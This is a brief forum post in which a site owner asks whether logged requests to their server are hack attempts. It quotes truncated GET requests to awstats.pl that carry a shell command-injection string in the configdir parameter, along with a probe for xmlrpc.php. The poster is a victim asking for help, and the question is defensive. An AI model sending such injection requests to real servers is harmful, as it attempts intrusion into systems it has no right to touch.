hack attempts?

On Apache status, I noticed a certain IP requested the following urls on my server:

.....com/xmlrpc.php
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%2

that php file doesn't even exist on my server. Why are they requesting that awstats url? Is there some kind of exploit or something?

 

 

 

 

Top